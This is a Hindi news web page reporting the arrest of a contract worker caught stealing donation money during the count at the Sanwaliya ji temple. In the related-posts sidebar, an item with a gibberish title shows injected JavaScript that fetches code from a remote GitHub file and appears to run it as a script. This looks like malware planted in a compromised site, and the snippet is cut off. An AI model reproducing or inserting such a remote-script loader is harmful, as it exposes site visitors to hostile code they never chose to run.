सांवरा के रुपयों पर मारा हाथ

Date:

BP4452435-large
सांवलियाजी। सांवलियाजी मंदिर में भंडार गणना के दौरान मंगलवार को मंदिर का ही एक संविदा कर्मचारी रुपए चुराते हुए रंगे हाथ पकड़ा गया। तलाशी में उसके पास से 24,100 रुपए बरामद किए गए। पुलिस ने उसे गिरफ्तार कर लिया।
मंदिर मंडल प्रशासन व पुलिस के अनुसार सुरक्षाकर्मी भोजराज गुर्जर को संविदाकर्मी कैलाश पुत्र मोहनलाल शर्मा पर शक हुआ, तो प्रशासनिक अधिकारी भगवानलाल चतुर्वेदी को बताया। इसके बाद कैलाश पर निगरानी रखी गई। इस दौरान रुपए चुराने की पुष्टि हो गई। चौकी प्रभारी एएसआई हरिसिंह के नेतृत्व में जाब्ता मंदिर के बाहर गणना स्थल से निकलने वालों की तलाशी लेने लगा। कैलाश शर्मा ने आनाकानी की, तो जबरन तलाशी ली गई। उसकी जेब से एक-एक हजार के 22 नोट मिले।
मंदिर मंडल की रिपोर्ट पर पुलिस ने कैलाश शर्मा को गिरफ्तार कर उसके घर भी तलाशी ली, जहां कुछ नहीं मिला। गौरतलब है कि भंडार गणना के दौरान पहले भी मंदिर मंडल कर्मचारी, पूर्व ट्रस्टी व बैंककर्मी आदि पकड़े जा चुके हैं। अधिकतर इनके खिलाÈ कानूनी कार्रवाई नहीं होने व भंडार सुरक्षा नियमों में ढील के कारण इस तरह की घटनाएं होती रहती हैं।
झूठे डिस्पोजल के बहाने भी चुराए 2100 रुपए:
कैलाश गणना के दौरान चाय पीने वालों के झूठे डिस्पोजल कप भी इक_े कर रहा था।
उसने कप में भी रुपए छिपा दिए। इन्हें खंगालने पर उनमें एक-एक हजार के दो व सौ का एक नोट भी बरामद हुए।

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Share post:

Subscribe

spot_imgspot_img

Popular

More like this
Related

oHmtKvYkl

QYRRUUjF;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script...

हिन्दुस्तान जिंक के स्वास्थ्य अभियान के तहत विश्व स्तनपान सप्ताह आयोजित

हिंदुस्तान जिंक, द्वारा स्वास्थ्य अभियान के तहत् विश्व स्तनपान...

हिंदुस्तान जिंक द्वारा खनन कार्यों में आंतरिक प्रतिभा के कौशल एवं अवसर वृद्धि हेतु जावर में ‘हिंदुस्तान जिंक माइनिंग अकादमी’ का शुभारंभ

इस अनूठी पहल से भूमिगत खदानों में जंबो हेल्पर्स प्रमाणित ऑपरेटर बन सकेंगे - पांच महीने तक चलनेवाले इस प्रशिक्षण कार्यक्रम में 16 सप्ताह का क्लासरूम इंस्ट्रक्शन शामिल होगा उदयपुर, 30 जुलाई, 2022: देश की एकमात्र और विश्व...